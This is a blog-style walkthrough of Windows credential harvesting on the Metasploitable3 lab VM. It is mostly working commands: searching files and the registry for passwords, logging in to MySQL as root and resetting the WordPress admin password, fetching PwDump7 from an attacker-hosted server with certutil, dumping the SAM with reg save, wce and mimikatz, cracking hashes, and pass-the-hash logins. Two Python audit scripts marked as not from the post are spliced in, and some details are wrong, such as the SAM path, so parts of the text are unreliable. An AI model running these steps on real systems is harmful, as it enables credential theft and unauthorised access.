WINDOWS PASSWORD MINING (2024)

Clement 'Tino · 15 min read · Jul 19, 2022


Password mining is the process of searching for and enumerating encrypted or clear-text passwords stored in persistent or volatile memory on the target system.

I'm gonna be honest, I used to hate Windows boxes. Usually, you're met with a Windows remote cmd shell and, after exhausting all your WinPEAS, WinES and Metasploit skills, you get stuck. So I decided to take time and study a bit about Windows privilege escalation, and these are the notes I made as I studied. Here, I'm assuming you already have a reverse cmd shell from your Windows target. Read my Pivoting and Port Forwarding post to learn how to use Metasploit to gain a foothold on a Windows system.

The target machine I'm using for this demo is Metasploitable3, a vulnerable Windows 2008 R2 server.

Now that we have established a cmd on our target machine, let’s try and enumerate all text files that contain the string “password” in them.

Use command:

findstr /si password *.txt

/s — searches for matching files in the current directory and sub-directories
/i — specifies that the search is not to be case sensitive.

findstr is a CLI tool for finding string patterns in text. In our case we are telling it to find the string "password" in every .txt file on the local partition.

We jump to the beginning of the local partition and run the command so that the findstr goes through all the text files located under the C: volume.


The output is large and can get overwhelming, but a careful study of it will show some really sensitive info. As in the screenshot above, you can see there's a WAMP server installed, and the password to phpMyAdmin is stored in Documentation.txt.

Other forms of the findstr command are:

findstr /si password *.xml *.ini *.txt

This will go through all .xml, .ini and .txt files for the “password” string.

findstr /si /m "password" *.xml *.ini *.conf *.txt

/m — print only the filename if the file contains the match.

The /m switch limits the output to the names of the files that contain the search string, without printing the matching lines themselves.


You can also search for a specific string across all files and folders, printing the file name and line number of every match (/p skips files with non-printable characters and /n prints the line number):

findstr /spin "password" *.*

You can search for file names containing various strings by using the dir tool in cmd:

dir /s *pass* == *cred* == *vnc* == *.config*

This command lists every file whose name matches one of the patterns, together with its location.

The Windows Unattended Setup utility automates the mass installation of Windows. It utilizes configuration files that contain specific configurations and user account credentials, which can be used by attackers to elevate privileges.

The details vary between versions of Windows. It's more effective when employed against organization-specific environments.

The first step involves searching for the unattended setup utility config files. The filenames vary between versions of Windows. Some of the common names are:

- Unattended.xml
- Autounattended.xml

As said already, the locations of these files also vary with each version of Windows. The common locations are:

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattended.xml

At times, instead of Unattended.xml or attended.xml, you may instead see Unattend.xml or attend.xml.


If the configuration files exist, they might contain the Administrator password, either in plaintext or encoded in base64.

- Sysprep is also a utility that can be used to automate Windows installation. It's used to deploy a Windows image to different Windows systems and can be used in conjunction with the Windows Unattended Setup utility to prepare the image for deployment.

Similarly, Sysprep utilizes config files that contain user credentials and customizations. Again, the names of these files vary between versions of Windows.

Some known names are:

- Sysprep.inf
- Sysprep.xml

They are usually located in:

C:\Windows\system32\sysprep\sysprep.xml

C:\Windows\system32\sysprep.inf

If these configuration files exist, they offer a straightforward path to authenticate to the system as the admin user and attain elevated privileges.

The Windows Registry is a database that contains configuration and settings for Windows and the other applications installed on the system. We can search the registry for specific strings to reveal user credentials. Use cmd:

reg query HKLM /f password /t REG_SZ /s

and

reg query HKCU /f password /t REG_SZ /s

To query a specific registry key, use cmd:

reg query <full path to registry key>

The two queries above output all registry entries that match the string "password".

Here I couldn't find anything, but had the user embedded their credentials under the autologon registry key, we could have queried that key to display the credentials.

Mining application configuration files depends on the application type. The techniques demonstrated in this section will depend on the type of target you are dealing with and its deployment use case. In our case, our target virtual machine has been set up as a server and has various vulnerable applications installed on it.

During an nmap scan against our Windows 2008 R2 server, we found that it was running services:

- phpmyadmin
- wordpress
- mysqlserver

Let’s see how you can locate the configuration files used by these applications.

Let's identify the web hosting stack being used by the server. Listing the contents of the root directory shows the server is running WAMP (Windows, Apache, MySQL, PHP).

Run cd wamp\www to see the type of applications being hosted.

Now listing all contents


We can see wordpress in there, being hosted as an application.

WordPress is a content management system that requires a database — in this case, MySQL — to store data and user credentials. It uses a remote connection to the database, and the access credentials are stored in the wp-config.php file. Let's search for this file in the wordpress directory.

There it is

Now let's read its contents.

Use the cmd command type to read files:

type wp-config.php

As you can see, we have the MySQL user credentials, and it turns out that the database has no password protecting it.
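As an added, defender-side example (not code from the post), here is a small Python check for the wp-config.php weakness found above: it parses the DB_* defines and flags a blank DB_PASSWORD, root used as the application account, and a DB_HOST that is not local. The sample fragment and the function names are constructed for this demo.

```python
import re

# Constructed wp-config.php fragment for the demo (not the file read in the post).
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', '');
define( "DB_HOST", "localhost" );
define('DB_CHARSET', 'utf8');
$table_prefix = 'wp_';
"""

# Matches define('KEY', 'value') in either quote style, with optional spaces.
_DEFINE_RE = re.compile(r"""define\(\s*(['"])(DB_[A-Z_]+)\1\s*,\s*(['"])(.*?)\3\s*\)""")


def parse_db_defines(text):
    """Return the DB_* constants of a wp-config.php as a dict."""
    return {m.group(2): m.group(4) for m in _DEFINE_RE.finditer(text)}


def audit_wp_config(text):
    """Flag the weaknesses the post exploits: blank DB password and root as the
    application account; also flag credentials that travel to a remote host."""
    cfg = parse_db_defines(text)
    findings = []
    user = cfg.get("DB_USER", "")
    if cfg.get("DB_PASSWORD", "") == "":
        findings.append(f"DB_PASSWORD is empty: '{user}' can log in to MySQL with no password")
    if user == "root":
        findings.append("DB_USER is root: WordPress should use a least-privilege database account")
    host = cfg.get("DB_HOST", "localhost").split(":")[0]
    if host not in ("localhost", "127.0.0.1", "::1"):
        findings.append(f"DB_HOST is {host}: database credentials are sent to a remote server")
    return findings


if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE_WP_CONFIG):
        print(finding)
```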

Accessing the SQL database from the attacker's machine

Let’s log into the MySQL server remotely from our attack box. Use command:

mysql -u root -p -h <target ip>

Press Enter when prompted for a password. After a successful authentication, we are now connected to the MySQL server as root and we can dump any database hosted on it.

Let’s start by enumerating the databases we have at our disposal.

show databases;

Select one of the DBs(wordpress in my case).

use wordpress;

Now let’s see the tables available under this DB

show tables;

Why don’t we take a look at the wp_users table.

select * from wp_users;

Wow! This is getting exciting. The user passwords are hashed with MD5, which is easy to crack.

Also, due to the fact that we have root access, we can change the admin password to a different one of our own choosing with command:

update wp_users set user_pass = MD5('Password123!') where ID = 1;

You can now log into the wordpress admin panel with the credentials.

Now you have total control of MySQL and the Wordpress site.

Accessing the SQL database through the web

A simple Nmap service scan showed many HTTP services running on the Target. I tested all the ports in the browser till I got to port 8585.

I was greeted with the WAMP server homepage.

It had links to phpMyAdmin, MySQL and WordPress.

So I went with sqlbuddy since it had SQL in its name.

I was met with a login panel. Since the config file showed that the MySQL server allows the root user to log in without a password, I authenticated as root with no password and was successfully logged in.

You can see the DBs lined up on the left. Let's take a look at the wordpress DB.

Taking a look at the wp_users table

On the left, there’s the Query menu which gives you a field to manually enter mySQL queries to alter the DBs. Use that to alter the admin password.


We can gain access to the phpMyAdmin control panel by locating and reading the contents of its configuration file. The config file is located at:

C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.php

Let's read it.

type config.inc.php

You can see the credentials to the phpMyAdmin panel are stored in the file, which also allows a passwordless login.

Using the link on the WAMP server homepage, we open phpmyAdmin and we are met with a login screen.

With a username of root and no password, we are logged in. We should now have root access to the phpMyAdmin control panel and be able to create, modify, and delete the contents of databases.

Before I continue, let's take a look at how Windows stores its hashes.

The Security Accounts Manager (SAM) is a database that manages users and their passwords on Windows. Each password stored in the SAM file is hashed. Authentication and verification of user credentials is done by the Local Security Authority (LSA).

The SAM database is exposed in the Windows Registry under:

HKEY_LOCAL_MACHINE\SAM

Now that we've seen where Windows hashes are stored, let's take a look at some of the password hashing schemes Windows employs.

LM is a weak authentication protocol whose hashes can easily be cracked. This is how it hashes passwords:

- The password is converted into a hash by breaking it into two seven-character chunks.
- All characters are then converted into uppercase.
- Each chunk is then encrypted with a 56-bit DES key.

This makes it weak because:

- The 56-bit DES key is weak and can be cracked relatively easily.
- Because all characters are converted to uppercase, the cracking process is relatively simple through a brute-force or dictionary attack.
- Versions of Windows that utilize LM are restricted to a maximum of 14 characters for user account passwords.

Let’s take a look at NTLM

NTLM was supposed to be an improvement of LM. NTLM authentication operates under the client-server model of communication and involves a handshake process, similar to the TCP three-way handshake.

NTLM operates under a challenge response system, and the hashing process can be broken down into the following steps:

- When a user account is created, its password is hashed using the MD4 algorithm, and the original password is discarded.
- During authentication, the username is sent to the server. The server then creates a 16-byte random string and sends it to the client. This is known as the challenge.
- The client encrypts the string with the password hash using the Data Encryption Standard (DES) algorithm and sends it back to the server. This is known as the response.
- The server then compares the hashed string (response) to the original. If it matches, authentication is completed.

PwDump7.exe is a binary that extracts the SAM file and dumps the hashes. It needs to be run locally on the victim's computer, so you upload it to the victim machine and execute it.

The SAM and SYSTEM files can be easily located in

C:\Users\Windows\system32\config\


Setting up a temporary Python server on my attack box, to serve the binary to the windows machine

sudo python -m SimpleHTTPServer

NB: Make sure to transfer the libeay32.dll library file along with the binary to the windows machine

Now downloading it to the windows machine

certutil.exe -f -URLcache http://<attacker ip>:8000/PwDump7.exe PwDump7.exe

Now the library file

certutil.exe -f -URLcache http://<attacker ip>:8000/libeay32.dll libeay32.dll

Now we have our two files (binary + DLL file) on the target Windows machine.

Let’s save the SAM file to the C:\ drive

reg save hklm\sam C:\sam

Save the SYSTEM file also

reg save hklm\SYSTEM C:\system

Now run PwDump7.exe with the saved SAM file and the SYSTEM file to extract the hashes.

PwDump7.exe -s C:\sam C:\system

NB: You can also run PwDump7.exe on its own to dump the hashes without having to save the SAM and SYSTEM registry hives first.

Samdump2 is a Linux tool used to extract the hashes from saved SAM and SYSTEM hives.

We can save the registry value of our SAM file to our target locally with command:

reg save hklm\sam C:\sam

Now we download the saved files onto the attack box and use samdump2.

Now on your attack box, run samdump2 with the SAM and SYSTEM files.

This is a Metasploit command that dumps all users and their hashes if executed with the right permissions.

wce.exe (which comes prepackaged with Kali) is a Windows binary that lists the logon sessions and their corresponding NTLM hashes.

From our attack box, let's serve the binary for download.

Now let's download it to the Windows target.

Now you run it.

With this, you're only able to dump the hashes of currently logged-on users.

You can also dump the plaintext passwords of those sessions with wce using the command:

wce64.exe -w

In Metasploit, use post/windows/gather/credentials/credential_collector

Set SESSION to your current active session and run it.

We can't talk about dumping credentials without talking about Mimikatz. It's a credential dumping tool when executed with the right privileges. It's not limited to credential dumping, as it has other useful purposes such as token impersonation.

Even though we can load it from its metasploit module, I’m choosing to go the long way of manually uploading it and executing it.

It also comes prepackaged with Kali (located in /usr/share/windows-resources/mimikatz directory) so I’m going to host the entire x64 binary folder together with its dependencies for download.

Downloading on the Windows machine

Now run mimikatz.exe on the target machine.

Run token::elevate to elevate your permissions, since you need high privileges to access the SAM file.

Now dump the SAM file hashes with the command lsadump::sam

We have been able to dump the user account hashes. Apart from wce64.exe, which dumped the logged-on users' passwords in plaintext, the other tools could only dump hashes. In this section, I'm going to demonstrate how you can utilize some open source tools to crack these hashes.

Structure of a typical windows Hash


<username>:<RID>:<LM>:<NTLM>
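As an added example (not part of the post), here is a Python audit of a dump in the layout just shown, written from the defender's side: it flags blank passwords, accounts that still store an LM hash, a renamed RID 500 account, and password reuse, which the unsalted NT hash reveals as identical values. The sample lines and their hash values are constructed for the demo; the two EMPTY constants are the well-known hashes of a disabled LM hash and of the empty NT password.

```python
# Constructed sample in pwdump/samdump2 layout (user:RID:LM:NT:::). The hash
# values are placeholders, not the Metasploitable3 dump from the post.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11112222333344445555666677778888:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:11112222333344445555666677778888:::
bob:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """Parse user:RID:LM:NT lines into (user, rid, lm, nt) tuples; blank lines are skipped."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            raise ValueError("malformed pwdump line: " + line)
        records.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return records


def audit_pwdump(text):
    """Defender-side review of a dump: blank passwords, LM hashes still stored,
    a renamed built-in Administrator, and reuse exposed by identical NT hashes."""
    findings = []
    by_nt = {}
    for user, rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            findings.append(f"{user}: blank password")
        if lm != EMPTY_LM:
            findings.append(f"{user}: LM hash still stored (LM hashing not disabled)")
        if rid == 500 and user.lower() != "administrator":
            findings.append(f"{user}: built-in Administrator account (RID 500) has been renamed")
        by_nt.setdefault(nt, []).append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append("shared password (identical NT hash): " + ", ".join(users))
    return findings


if __name__ == "__main__":
    for finding in audit_pwdump(SAMPLE_DUMP):
        print(finding)
```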

John the Ripper is an open source password security, auditing, and recovery utility that supports a large number of hashes and ciphers. We will start by saving all our password hashes into a txt file I'll call hashes.txt.

The content of hashes.txt should be similar to this


Now we run John the ripper with the command:

sudo john --format=NT hashes.txt

This will run with John's default password wordlist. You can specify your own wordlist with the --wordlist option.

It starts to crack the password hashes one after the other. Depending on the number of hashes and the complexity of the passwords, John can take hours (or even days) to crack them, so it's better to always limit it to the hashes of interest only.

Hashcat is another password cracking tool, and my favorite actually. With the same hashes.txt, run it with hashcat together with the rockyou wordlist:

hashcat -a 0 -m 1000 hashes.txt <wordlist>

- -m sets the hash mode. NTLM hashes have mode 1000.
- -a sets the attack mode. 0 means a straight attack: each word in the wordlist is tried as-is, without any combinations or rules.

Now what can you do with these set of credentials after cracking them?

Here, I’m going to show you how you can use the newly found credentials to authenticate against the target to obtain privileged access. There are various techniques but I’m going to highlight a few ways.

Let's say you're finding it difficult to crack the hash: you can authenticate to the target using the dumped hash without knowing its plaintext form. I'll be utilizing one of Impacket's tools called psexec.

PsExec is a tool used to authenticate to Windows machines and can be used to pass the hash too.

It has a module embedded in metasploit.

use exploit/windows/smb/psexec

Set the required options (SMBUser, SMBPass(hash), RHOSTS most importantly)

Now you get a Meterpreter session as the Administrator.

John cracked the hash of Administrator as ‘vagrant’. Let’s try to see if RDP is enabled on the windows target and if so, can we authenticate.

RDP runs on port 3389. An nmap scan revealed port 3389 to be open

xfreerdp /u:<username> /p:<password> /cert:ignore /v:<target ip> /dynamic-resolution

We successfully RDP’d into the target with the admin credentials. We have control of the Domain.


If the target has any form of ssh server installed on it, you can SSH into it with any valid pair of credentials. From hashcat, we saw that the password of c_three_pio was pr0t0c0l. Let’s see if we can SSH into the system.

ssh <username>@<target ip>

After typing the password, we get a cmd shell


I got most of the knowledge for this post by purchasing and reading HackerSploit's Privilege Escalation Techniques book. You can purchase it from his website or by clicking here. If you have any questions, you can DM me on Twitter @tinopreter.
